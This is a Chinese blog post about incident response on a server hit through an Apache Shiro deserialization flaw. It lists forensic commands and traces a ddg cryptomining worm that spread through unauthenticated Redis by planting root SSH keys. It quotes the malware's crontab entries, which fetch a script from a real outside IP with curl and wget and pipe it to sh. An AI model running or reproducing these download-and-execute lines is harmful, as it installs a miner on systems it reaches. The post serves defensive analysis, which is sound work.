码迷,mamicode.com
首页 > 其他好文 > 详细

应急响应--记录一次漏洞紧急处理中意外发现的挖矿木马(Shiro反序列化漏洞和ddg挖矿木马)

时间:2018-07-02 11:09:25      阅读:197      评论:0      收藏:0      [点我收藏+]

标签:roo   ssl https   -o   apache   有一个   tab   地方   AC   操作   

背景


某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞,可以直接GetShell。出于做安全的谨慎,马上出现场应急,确认漏洞。该漏洞存在在cookie字段中的rememberMe字段中,可以RCE

漏洞应急


来到现场后,发现已经升级了,漏洞确认修复完成,只能查看以前的攻击痕迹。

查看账号情况

首先查看账户文件/etc/passwd,修改时间和内容没有什么问题

stat /etc/passwd 
cat /etc/passwd

查看文件情况

查看最近修改过的文件没看到特殊异常

ls -alst / -m -10 -name *

查看进程

查看进程

ps aux 

看到异常 perl nc2.pl 后面参数跟着一个灯塔国地址,马上想到是反弹的shell,查问漏洞检测者,果真是,确认无害后kill进程。

查看网络连接

netstat -anop | grep tcp

发现服务器对外连接很多22端口,觉得异常,服务器主动对外发起连接22端口,很少见,询问业务也没有这类业务。看相关进程号,查看进程名ddg.2020。明显是一个矿马,经排查服务器上还启动redis和memcached。都是未授权访问。目测,是对外发起6379未授权漏洞的利用,写了root下的id_rsa.pub然后尝试22登录,看下自己的root下的.sshd,果真有id_rsa.pub不正常,因为都不适用root登录遂删除。查看进程目录。/tmp下面的,没有这个文件样板,全盘搜,只有ddg.2020.db没有ddg.2020,随机google,发现该样本会删除自己的文件,并启动定时任务去下载自己。

sudo -i
crontab -e

没有发现问题,还有一个地方

cat /var/spool/cron/crontabs/root

果然看到

curl -fsSL https://218.248.40.228:8443/i.sh | sh
wget -g -O -http://218.248.40.228:8443/i.sh | sh

马上配置阻断

查看进程运行时间对应的操作

history #只有四百多条,很明显不对
who /var/log/wtmp 
last
last /var/run/utmp #

发现那天的登录日志被清理。
查看VPC内其他主机,都不存在该蠕虫,那么肯定就是通过getshell打进来,然后种了样本之后离开的。

总结


异常的发现在于明显区别于正常使用用途的网络连接。

应急响应--记录一次漏洞紧急处理中意外发现的挖矿木马(Shiro反序列化漏洞和ddg挖矿木马)

标签:roo   ssl https   -o   apache   有一个   tab   地方   AC   操作   

原文地址:https://www.cnblogs.com/KevinGeorge/p/9252031.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!